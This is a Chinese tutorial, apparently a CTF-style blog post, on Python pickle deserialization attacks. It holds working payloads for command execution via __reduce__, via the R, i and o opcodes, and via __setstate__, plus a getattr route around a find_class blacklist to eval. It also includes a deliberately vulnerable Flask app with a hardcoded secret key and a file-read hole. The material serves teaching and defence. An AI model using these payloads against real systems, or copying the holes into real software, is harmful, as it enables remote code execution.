Python中原生提供了Pickle库来实现对象的序列化和反序列化。与前两篇中提及的语言不同的是。Pickle有堆栈机制,完全可以看作一种独立的语言,通过编写opcode可以执行python代码、覆盖变量等操作,导致pickle解析能力大于pickle生成能力,直接编写的opcode灵活性比使用pickle序列化生成的代码更高,有的代码不能通过pickle序列化得到。这也就带来了更为多变的攻击手段。
Python中提供了Pickel库用来序列化和反序列化数据,同时通过pickeltools,我们可以方便地对Pickel序列化的数据进行调试。
举一个简单的例子来说明
class Student():
def __init__(self) -> None:
self.name = \'Eki\'
self.grade = "2021"
def __repr__(self) -> str:
return f\'Type:{type(self)} name:{self.name} grade:{self.grade}\'
import pickle
import pickletools
raw = pickle.dumps(Student(),protocol=3)
raw = pickletools.optimize(raw)
print(raw)
\'\'\'
\\x80\\x03c__main__\\nStudent\\n)\\x81}(X\\x04\\x00\\x00\\x00nameX\\x03\\x00\\x00\\x00EkiX\\x05\\x00\\x00\\x00gradeX\\x04\\x00\\x00\\x002021ub.
\'\'\'
pickletools.dis(raw)
\'\'\'
0: \\x80 PROTO 3
2: c GLOBAL \'__main__ Student\'
20: ) EMPTY_TUPLE
21: \\x81 NEWOBJ
22: } EMPTY_DICT
23: ( MARK
24: X BINUNICODE \'name\'
33: X BINUNICODE \'Eki\'
41: X BINUNICODE \'grade\'
51: X BINUNICODE \'2021\'
60: u SETITEMS (MARK at 23)
61: b BUILD
62: . STOP
highest protocol among opcodes = 2
\'\'\'
res = pickle.loads(raw)
print(res)
可以看到Pickle是通过一系列的指令(opcode)来序列化和反序列化对象的。其中分为不同的Pickle协议版本,可以通过pickle.dumps(protocol=x)
来指定。pickletools.dis可以帮助我们理解生成的pickle字节流,显示对应的指令作用。比如开始的\\x80
后跟的3了pickle的版本。
为了实现自定义反序列化,pickle还提供了一个钩子函数__reduce__
, __reduce__
被定义之后,当对象被Pickle时就会被调用。它要么返回一个代表全局名称的字符串,Pyhton会查找它并pickle,要么返回一个元组。这个元组包含2到5个元素,其中包括:一个可调用的对象,用于重建对象时调用;一个参数元素,供那个可调用对象使用;被传递给 __setstate__
的状态(可选);一个产生被pickle
的列表元素的迭代器(可选);一个产生被pickle
的字典元素的迭代器(可选)
class Evil():
def __init__(self) -> None:
self.whatever = "whatever"
def __reduce__(self) -> Union[str, Tuple[Any, ...]]:
return os.system,(cmd,)
\'\'\'
b\'\\x80\\x03cposix\\nsystem\\nX\\x02\\x00\\x00\\x00id\\x85R.\'
0: \\x80 PROTO 3
2: c GLOBAL \'posix system\'
16: X BINUNICODE \'id\'
23: \\x85 TUPLE1
24: R REDUCE
25: . STOP
\'\'\'
可以看到我们重载__reduce__
序列化数据完全改变了,甚至与Evil这个类没啥关系。其中OpcodeR
的作用与object.__reduce__()
关系密切:选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数。其实R
正好对应object.__reduce__()
函数, object.__reduce__()
的返回值会作为R
的作用对象,当包含该函数的对象被pickle序列化时,得到的字符串是包含了R
的。
也就是说在这里我们相当于执行了posix system
,参数为(id)
再来看一个经典的例子,通过Pickle反序列化覆盖全局变量
我们很容易想到与前文类似的方法通过exec命令执行的方式覆盖
import pickle
key = b\'eki\'
class A(object):
def __reduce__(self):
return (exec,("key=b\'jacey\'",))
a = A()
pickle_a = pickle.dumps(a)
print(pickle_a)
pickle.loads(pickle_a)
print(key)
但是如果题目直接禁止了Reduce的使用,比如过滤R
import pickle
import base64
import pickletools
class Student():
def __init__(self,name:str,garade:str) -> None:
self.name = name
self.grade = garade
def __eq__(self, o: object) -> bool:
return type(o) is Student and \\
self.name == o.name and \\
self.grade == o.grade
import secret
\'\'\'
name = "Jacey"
grade = "2019"
\'\'\'
def check(data:bytes)->str:
if b\'R\' in data:
return \'no reduce!\'
x = pickle.loads(data)
print(secret.name,secret.grade)
if(x != Student(secret.name,secret.grade)):
return \'Not equal\'
return \'well done!\'
payload =b"""\\x80\\x03
c
__main__\\n
secret\\n
}
(
Vname\\n
Veki\\n
Vgrade\\n
V2019\\n
u
b
0
c
__main__\\n
Student\\n
)
\\x81
}
(
Vname\\n
Veki\\n
Vgrade\\n
V2019\\n
u
b
.
""".replace(b"\\n\\n",b"^^").replace(b"\\n",b"").replace(b"^^",b"\\n")
pickletools.dis(payload)
print(check(payload))
这种情况下,通过c__main__.secret
引入这一个module
,把一个dict压进栈,内容是{'name': 'rua', 'grade': 'www'},执行BUILD指令,会导致改写__main__.secret.name
和__main__.secret.grade
,至此secret.name
和secret.grade
已经被篡改成我们想要的内容
更进一步的,如果R
被过滤了,还能实现命令执行吗
class _Unpickler:
def load_build(self):
stack = self.stack
state = stack.pop()
inst = stack[-1]
setstate = getattr(inst, "__setstate__", None)#此处获取inst的__setstate__函数,如果存在,那么下面调用该函数
if setstate is not None:
setstate(state)
return
slotstate = None
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
if state:
inst_dict = inst.__dict__
intern = sys.intern
for k, v in state.items():
if type(k) is str:
inst_dict[intern(k)] = v
else:
inst_dict[k] = v
if slotstate:
for k, v in slotstate.items():
setattr(inst, k, v)
dispatch[BUILD[0]] = load_build
那么有
import pickle
import pickletools
class Student():
def __init__(self) -> None:
self.name = \'Eki\'
self.grade = "2021"
def __repr__(self) -> str:
return f\'Type:{type(self)} name:{self.name} grade:{self.grade}\'
payload = b"""\\x80\\x03
c
__main__\\n
Student\\n
)
\\x81
}
(
V__setstate__\\n
c
os\\n
system\\n
u
b
Vls /\\n
b
.""".replace(b"\\n\\n",b"^^").replace(b"\\n",b"").replace(b"^^",b"\\n")
pickletools.dis(payload)
res = pickle.loads(payload)
通过设置inst
的__setstate__
我们也可以进行RCE
除了自己手写Pickle的Opcode以外,我们也可以利用一些工具进行辅助,比如
相当于手写pickle opcode的辅助工具
Example:
from PickleBuilder import PickleBuilder
p = PickleBuilder()
p.push_mark()
p.push_str("echo eki")
p.load_inst("os","system")
print(pickle.loads(p.compile()))
通过AST解析类python代码生成对应pickle
Example:
class Student():
def __init__(self) -> None:
self.name = \'Eki\'
self.grade = "2019"
def __repr__(self) -> str:
return f\'Type:{type(self)} name:{self.name} grade:{self.grade}\'
payload = """student = OBJ(GLOBAL(\'__main__\', \'Student\'))
student.name = \'Eki\'
student.grade = \'2022\'
return student
"""
from pickle import loads
from pker import cons
#print(cons(payload))
print(loads(cons(payload)))
通过对opcode进行分析,我们可以发现与函数执行相关的opcode有三个: R
、 i
、 o
,以及之前提到的__setstate__
覆盖导致的RCE,所以我们可以从四个方向进行构造:
R
: [callable] [tuple] R
调用一个callable对象b\'\'\'cos
system
(S\'whoami\'
tR.\'\'\'
i
:i[module]\\n[callable]\\n
相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象) (S\'whoami\'
ios
system
.\'\'\'
o
:MARK [callable] [args...] o
同INST,参数获取方式由readline变为stack.pop而已 (cos
system
S\'whoami\'
o.
b
: 根据Unpickler类的代码,再load_build过程中也就是在b操作码执行过程中,如果存在自定义的__setstate__
,则会进入 def load_build(self):
stack = self.stack
state = stack.pop()
inst = stack[-1]
setstate = getattr(inst, "__setstate__", None)#此处获取inst的__setstate__函数,如果存在,那么下面调用该函数
if setstate is not None:
setstate(state)
return
所以可以通过构造__setstate__来进行任意函数执行。但是这种方法需要一个可用的类。
\\x80\\x03c__main__
Student
)\\x81}(
V__setstate__
cos
system
ubVls /
b.
首先能一种简单粗暴的方法是ban了所有可能导致RCE的opcode,也即上面提到的i,o,R,b
,但是很显然b
是肯定没法ban的,因为正常反序列化也需要他,而i,o,R
这几个误伤也比较大。
第二种缓解策略是通过重写Pickle的find_class
限制能调用的模块
比如下面
class RestrictedUnpickler(pickle.Unpickler):
blacklist = {\'eval\', \'exec\', \'execfile\', \'compile\', \'open\', \'input\', \'__import__\', \'exit\', \'map\'}
def find_class(self, module, name):
if module == "builtins" and name not in self.blacklist:
return getattr(builtins, name)
raise pickle.UnpicklingError("global \'%s.%s\' is forbidden" % (module, name))
def loads(data):
return RestrictedUnpickler(io.BytesIO(data)).load()
然而通过getattar
方法我们可以轻松绕过限制
from pker import cons
payload = """getattr = GLOBAL(\'builtins\', \'getattr\')
dict = GLOBAL(\'builtins\', \'dict\')
dict_get = getattr(dict, \'get\')
globals = GLOBAL(\'builtins\', \'globals\')
builtins = globals()
__builtins__ = dict_get(builtins, \'__builtins__\')
eval = getattr(__builtins__, \'eval\')
eval(\'__import__("os").system("whoami")\')
return
"""
payload = cons(payload)
loads(payload)
相当于
builtins.dict.get(builtins.globals(),\'__builtins__\').eval(\'__import__("os").system("whoami")\')
即通过builtins拿到新的builtins绕过限制
from flask import Flask
from flask import request
from flask import render_template
from flask import session
import base64
import pickle
import io
import builtins
class Student():
def __init__(self) -> None:
self.name = \'Eki\'
self.grade = "2019"
def __repr__(self) -> str:
return f\'Type:{type(self)} name:{self.name} grade:{self.grade}\'
class RestrictedUnpickler(pickle.Unpickler):
blacklist = {\'eval\', \'exec\', \'execfile\', \'compile\', \'open\', \'input\', \'__import__\', \'exit\', \'map\'}
def find_class(self, module, name):
if module == "builtins" and name not in self.blacklist:
return getattr(builtins, name)
raise pickle.UnpicklingError("global \'%s.%s\' is forbidden" % (module, name))
def loads(data):
return RestrictedUnpickler(io.BytesIO(data)).load()
app = Flask(__name__)
app.config[\'SECRET_KEY\'] = "y0u-wi11_neuer_kn0vv-!@#se%32"
@app.route(\'/admin\', methods = ["POST","GET"])
def admin():
if(\'{}\'.format(session[\'username\'])!= \'admin\' and str(session[\'username\'] , encoding = "utf-8")!= \'admin\'):
return "not admin"
try:
data = base64.b64decode(session[\'data\'])
if "R" in data.decode():
return "nonono"
loads(data)
except Exception as e:
print(e)
return "success"
@app.route(\'/login\', methods = ["GET","POST"])
def login():
username = request.form.get(\'username\')
password = request.form.get(\'password\')
imagePath = request.form.get(\'imagePath\')
session[\'username\'] = username + password
session[\'data\'] = base64.b64encode(pickle.dumps(\'hello\' + username, protocol=0))
try:
f = open(imagePath,\'rb\').read()
except Exception as e:
f = open(\'static/image/error.png\',\'rb\').read()
imageBase64 = base64.b64encode(f)
return render_template("login.html", username = username, password = password, data = bytes.decode(imageBase64))
@app.route(\'/\', methods = ["GET","POST"])
def index():
return render_template("index.html")
if __name__ == \'__main__\':
app.run(host=\'0.0.0.0\', port=\'8888\')
值得一提的是除了pickle.load
,python
其他模块也能触发pickle
反序列化漏洞。
例如:numpy.load()
会先尝试以numpy自己的数据格式导入;如果失败,则尝试以pickle
的格式导入,触发pickle
反序列化
PyYAML https://xz.aliyun.com/t/7923
Pickle官方文档 https://docs.python.org/zh-cn/3/library/pickle.html
从零开始python反序列化攻击:pickle原理解析 & 不用reduce的RCE姿势 https://zhuanlan.zhihu.com/p/89132768
pickle反序列化初探 https://xz.aliyun.com/t/7436